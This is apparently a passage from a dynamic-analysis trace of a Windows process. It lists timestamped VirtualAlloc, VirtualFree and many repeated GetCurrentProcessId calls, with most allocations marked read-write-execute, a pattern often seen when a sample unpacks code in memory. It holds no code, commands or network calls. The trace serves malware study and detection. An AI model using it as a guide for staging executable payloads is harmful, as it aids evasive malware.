VirtualAlloc (lpAddress=0x220c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x220c000 [0133.659] GetCurrentProcessId () returned 0xeb4 [0133.659] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2f70000 [0133.659] VirtualAlloc (lpAddress=0x0, dwSize=0xc5, flAllocationType=0x1000, flProtect=0x40) returned 0x2f80000 [0133.660] VirtualAlloc (lpAddress=0x0, dwSize=0xa7, flAllocationType=0x1000, flProtect=0x40) returned 0x2f90000 [0133.660] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x2fa0000 [0133.661] VirtualAlloc (lpAddress=0x0, dwSize=0x281, flAllocationType=0x1000, flProtect=0x40) returned 0x2fb0000 [0133.661] VirtualAlloc (lpAddress=0x0, dwSize=0x8e, flAllocationType=0x1000, flProtect=0x40) returned 0x2fc0000 [0133.662] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x2fd0000 [0133.662] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x2fe0000 [0133.663] VirtualAlloc (lpAddress=0x0, dwSize=0xbe, flAllocationType=0x1000, flProtect=0x40) returned 0x2ff0000 [0133.663] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x3000000 [0133.664] VirtualAlloc (lpAddress=0x0, dwSize=0x323, flAllocationType=0x1000, flProtect=0x40) returned 0x3010000 [0133.664] GetCurrentProcessId () returned 0xeb4 [0133.664] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3020000 [0133.665] VirtualAlloc (lpAddress=0x0, dwSize=0x9d, flAllocationType=0x1000, flProtect=0x40) returned 0x3030000 [0133.665] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x3040000 [0133.666] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x3050000 [0133.666] VirtualAlloc (lpAddress=0x0, dwSize=0x97, flAllocationType=0x1000, flProtect=0x40) returned 0x3060000 [0133.667] VirtualAlloc (lpAddress=0x0, dwSize=0x42b, flAllocationType=0x1000, flProtect=0x40) returned 0x3070000 [0133.668] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x3080000 [0133.668] VirtualAlloc (lpAddress=0x0, dwSize=0x20b, flAllocationType=0x1000, flProtect=0x40) returned 0x3090000 [0133.669] VirtualAlloc (lpAddress=0x0, dwSize=0x8f, flAllocationType=0x1000, flProtect=0x40) returned 0x30a0000 [0133.669] VirtualAlloc (lpAddress=0x0, dwSize=0x99, flAllocationType=0x1000, flProtect=0x40) returned 0x30b0000 [0133.670] VirtualAlloc (lpAddress=0x0, dwSize=0xab, flAllocationType=0x1000, flProtect=0x40) returned 0x30c0000 [0133.671] GetCurrentProcessId () returned 0xeb4 [0133.671] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x30d0000 [0133.671] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x1000, flProtect=0x40) returned 0x30e0000 [0133.672] VirtualAlloc (lpAddress=0x0, dwSize=0x65f, flAllocationType=0x1000, flProtect=0x40) returned 0x30f0000 [0133.673] VirtualAlloc (lpAddress=0x0, dwSize=0xd2, flAllocationType=0x1000, flProtect=0x40) returned 0x3100000 [0133.673] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x3110000 [0133.674] VirtualAlloc (lpAddress=0x0, dwSize=0xa1, flAllocationType=0x1000, flProtect=0x40) returned 0x3120000 [0133.674] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x3130000 [0133.675] VirtualAlloc (lpAddress=0x0, dwSize=0x418, flAllocationType=0x1000, flProtect=0x40) returned 0x3140000 [0133.675] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x3150000 [0133.676] VirtualAlloc (lpAddress=0x0, dwSize=0xd8, flAllocationType=0x1000, flProtect=0x40) returned 0x3160000 [0133.676] VirtualAlloc (lpAddress=0x0, dwSize=0x97, flAllocationType=0x1000, flProtect=0x40) returned 0x3170000 [0133.677] VirtualAlloc (lpAddress=0x2210000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2210000 [0133.677] GetCurrentProcessId () returned 0xeb4 [0133.678] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3180000 [0133.678] VirtualAlloc (lpAddress=0x0, dwSize=0x26a, flAllocationType=0x1000, flProtect=0x40) returned 0x3190000 [0133.679] VirtualAlloc (lpAddress=0x0, dwSize=0x81, flAllocationType=0x1000, flProtect=0x40) returned 0x31a0000 [0133.679] VirtualAlloc (lpAddress=0x0, dwSize=0x79, flAllocationType=0x1000, flProtect=0x40) returned 0x31b0000 [0133.680] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x31c0000 [0133.680] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x31d0000 [0133.681] VirtualAlloc (lpAddress=0x0, dwSize=0xb5, flAllocationType=0x1000, flProtect=0x40) returned 0x31e0000 [0133.681] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x31f0000 [0133.682] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x3200000 [0133.683] VirtualAlloc (lpAddress=0x0, dwSize=0x396, flAllocationType=0x1000, flProtect=0x40) returned 0x3210000 [0133.683] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x3220000 [0133.684] GetCurrentProcessId () returned 0xeb4 [0133.684] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3230000 [0133.684] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x3240000 [0133.685] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x1000, flProtect=0x40) returned 0x3250000 [0133.686] VirtualAlloc (lpAddress=0x0, dwSize=0x521, flAllocationType=0x1000, flProtect=0x40) returned 0x3260000 [0133.686] VirtualAlloc (lpAddress=0x0, dwSize=0xcb, flAllocationType=0x1000, flProtect=0x40) returned 0x3270000 [0133.687] VirtualAlloc (lpAddress=0x0, dwSize=0xad, flAllocationType=0x1000, flProtect=0x40) returned 0x3280000 [0133.688] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x3290000 [0133.688] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x32a0000 [0133.689] VirtualAlloc (lpAddress=0x0, dwSize=0x88, flAllocationType=0x1000, flProtect=0x40) returned 0x32b0000 [0133.689] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x32c0000 [0133.690] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x1000, flProtect=0x40) returned 0x32d0000 [0133.691] VirtualAlloc (lpAddress=0x2214000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2214000 [0133.691] GetCurrentProcessId () returned 0xeb4 [0133.691] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x32e0000 [0133.692] VirtualAlloc (lpAddress=0x0, dwSize=0x8b, flAllocationType=0x1000, flProtect=0x40) returned 0x32f0000 [0133.692] VirtualAlloc (lpAddress=0x0, dwSize=0x99, flAllocationType=0x1000, flProtect=0x40) returned 0x3300000 [0133.693] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x1000, flProtect=0x40) returned 0x3310000 [0133.694] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x3320000 [0133.694] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x3330000 [0133.695] VirtualAlloc (lpAddress=0x0, dwSize=0x86, flAllocationType=0x1000, flProtect=0x40) returned 0x3340000 [0133.696] VirtualAlloc (lpAddress=0x0, dwSize=0x91, flAllocationType=0x1000, flProtect=0x40) returned 0x3350000 [0133.696] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x1000, flProtect=0x40) returned 0x3360000 [0133.697] VirtualAlloc (lpAddress=0x0, dwSize=0x371, flAllocationType=0x1000, flProtect=0x40) returned 0x3370000 [0133.697] VirtualAlloc (lpAddress=0x0, dwSize=0x7f, flAllocationType=0x1000, flProtect=0x40) returned 0x3380000 [0133.698] GetCurrentProcessId () returned 0xeb4 [0133.698] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3390000 [0133.699] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x33a0000 [0133.699] VirtualAlloc (lpAddress=0x0, dwSize=0xa1, flAllocationType=0x1000, flProtect=0x40) returned 0x33b0000 [0133.700] VirtualAlloc (lpAddress=0x0, dwSize=0x327, flAllocationType=0x1000, flProtect=0x40) returned 0x33c0000 [0133.702] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x33d0000 [0133.702] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x1000, flProtect=0x40) returned 0x33e0000 [0133.703] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x1000, flProtect=0x40) returned 0x33f0000 [0133.704] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x3400000 [0133.704] VirtualAlloc (lpAddress=0x0, dwSize=0xc1, flAllocationType=0x1000, flProtect=0x40) returned 0x3410000 [0133.705] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x1000, flProtect=0x40) returned 0x3420000 [0133.706] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x3430000 [0133.706] GetCurrentProcessId () returned 0xeb4 [0133.706] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3440000 [0133.707] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x3450000 [0133.708] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x3460000 [0133.708] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x3470000 [0133.709] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x3480000 [0133.710] VirtualAlloc (lpAddress=0x0, dwSize=0xb5, flAllocationType=0x1000, flProtect=0x40) returned 0x3490000 [0133.710] VirtualAlloc (lpAddress=0x0, dwSize=0xd1, flAllocationType=0x1000, flProtect=0x40) returned 0x34a0000 [0133.711] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x34b0000 [0133.711] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x34c0000 [0133.712] VirtualAlloc (lpAddress=0x0, dwSize=0xb3, flAllocationType=0x1000, flProtect=0x40) returned 0x34d0000 [0133.713] VirtualAlloc (lpAddress=0x0, dwSize=0x1f3, flAllocationType=0x1000, flProtect=0x40) returned 0x34e0000 [0133.713] GetCurrentProcessId () returned 0xeb4 [0133.714] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x34f0000 [0133.714] VirtualAlloc (lpAddress=0x0, dwSize=0x18a, flAllocationType=0x1000, flProtect=0x40) returned 0x3500000 [0133.715] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x3510000 [0133.716] VirtualAlloc (lpAddress=0x0, dwSize=0xa9, flAllocationType=0x1000, flProtect=0x40) returned 0x3520000 [0133.717] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x1000, flProtect=0x40) returned 0x3530000 [0133.717] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x3540000 [0133.743] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.743] GetCurrentProcessId () returned 0xeb4 [0133.744] GetCurrentProcessId () returned 0xeb4 [0133.744] GetCurrentProcessId () returned 0xeb4 [0133.744] GetCurrentProcessId () returned 0xeb4 [0133.744] GetCurrentProcessId () returned 0xeb4 [0133.744] GetCurrentProcessId () returned 0xeb4 [0133.744] GetCurrentProcessId () returned 0xeb4 [0133.744] GetCurrentProcessId () returned 0xeb4 [0133.744] GetCurrentProcessId () returned 0xeb4 [0133.744] GetCurrentProcessId () returned 0xeb4 [0133.744] GetCurrentProcessId () returned 0xeb4 [0133.744] GetCurrentProcessId () returned 0xeb4 [0133.746] GetCurrentProcessId () returned 0xeb4 [0133.746] GetCurrentProcessId () returned 0xeb4 [0133.781] GetCurrentProcessId () returned 0xeb4 [0133.781] GetCurrentProcessId () returned 0xeb4 [0133.781] GetCurrentProcessId () returned 0xeb4 [0133.781] GetCurrentProcessId () returned 0xeb4 [0133.782] GetCurrentProcessId () returned 0xeb4 [0133.782] GetCurrentProcessId () returned 0xeb4 [0133.782] GetCurrentProcessId () returned 0xeb4 [0133.782] GetCurrentProcessId () returned 0xeb4 [0133.782] GetCurrentProcessId () returned 0xeb4 [0133.782] GetCurrentProcessId () returned 0xeb4 [0133.783] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.784] GetCurrentProcessId () returned 0xeb4 [0133.784] GetCurrentProcessId () returned 0xeb4 [0133.784] GetCurrentProcessId () returned 0xeb4 [0133.784] GetCurrentProcessId () returned 0xeb4 [0133.784] GetCurrentProcessId () returned 0xeb4 [0133.784] GetCurrentProcessId () returned 0xeb4 [0133.784] GetCurrentProcessId () returned 0xeb4 [0133.784] GetCurrentProcessId () returned 0xeb4 [0133.784] GetCurrentProcessId () returned 0xeb4 [0133.784] GetCurrentProcessId () returned 0xeb4 [0133.784] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.785] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.786] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.787] GetCurrentProcessId () returned 0xeb4 [0133.788] GetCurrentProcessId () returned 0xeb4 [0133.788] GetCurrentProcessId () returned 0xeb4 [0133.788] GetCurrentProcessId () returned 0xeb4 [0133.788] GetCurrentProcessId () returned 0xeb4 [0133.788] GetCurrentProcessId () returned 0xeb4 [0133.788] GetCurrentProcessId () returned 0xeb4 [0133.788] GetCurrentProcessId () returned 0xeb4 [0133.788] GetCurrentProcessId () returned 0xeb4 [0133.788] GetCurrentProcessId () returned 0xeb4 [0133.788] GetCurrentProcessId () returned 0xeb4 [0133.788] GetCurrentProcessId () returned 0xeb4 [0133.789] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.789] GetCurrentProcessId () returned 0xeb4 [0133.789] GetCurrentProcessId () returned 0xeb4 [0133.789] GetCurrentProcessId () returned 0xeb4 [0133.789] GetCurrentProcessId () returned 0xeb4 [0133.789] GetCurrentProcessId () returned 0xeb4 [0133.789] GetCurrentProcessId () returned 0xeb4 [0133.789] GetCurrentProcessId () returned 0xeb4 [0133.789] GetCurrentProcessId () returned 0xeb4 [0133.789] GetCurrentProcessId () returned 0xeb4 [0133.789] GetCurrentProcessId () returned 0xeb4 [0133.789] GetCurrentProcessId () returned 0xeb4 [0133.790] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.791] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.792] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.793] GetCurrentProcessId () returned 0xeb4 [0133.794] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.794] GetCurrentProcessId () returned 0xeb4 [0133.794] GetCurrentProcessId () returned 0xeb4 [0133.794] GetCurrentProcessId () returned 0xeb4 [0133.794] GetCurrentProcessId () returned 0xeb4 [0133.795] GetCurrentProcessId () returned 0xeb4 [0133.795] GetCurrentProcessId () returned 0xeb4 [0133.795] GetCurrentProcessId () returned 0xeb4 [0133.795] GetCurrentProcessId () returned 0xeb4 [0133.795] GetCurrentProcessId () returned 0xeb4 [0133.795] GetCurrentProcessId () returned 0xeb4 [0133.795] GetCurrentProcessId () returned 0xeb4 [0133.795] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.796] GetCurrentProcessId () returned 0xeb4 [0133.796] GetCurrentProcessId () returned 0xeb4 [0133.796] GetCurrentProcessId () returned 0xeb4 [0133.796] GetCurrentProcessId () returned 0xeb4 [0133.796] GetCurrentProcessId () returned 0xeb4 [0133.796] GetCurrentProcessId () returned 0xeb4 [0133.796] GetCurrentProcessId () returned 0xeb4 [0133.796] GetCurrentProcessId () returned 0xeb4 [0133.796] GetCurrentProcessId () returned 0xeb4 [0133.796] GetCurrentProcessId () returned 0xeb4 [0133.796] GetCurrentProcessId () returned 0xeb4 [0133.796] GetCurrentProcessId () returned 0xeb4 [0133.796] GetCurrentProcessId () returned 0xeb4 [0133.796] GetCurrentProcessId () returned 0xeb4 [0133.797] GetCurrentProcessId () returned 0xeb4 [0133.797] GetCurrentProcessId () returned 0xeb4 [0133.797] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.798] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.799] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.801] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.802] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.803] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.804] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.805] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.806] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.839] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.840] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.876] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.876] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.877] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.878] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.879] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.880] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.881] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.882] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.882] VirtualFree (lpAddress=0x35b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.889] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.890] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.891] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.892] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.893] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.894] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.895] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.896] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.897] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.898] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.898] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 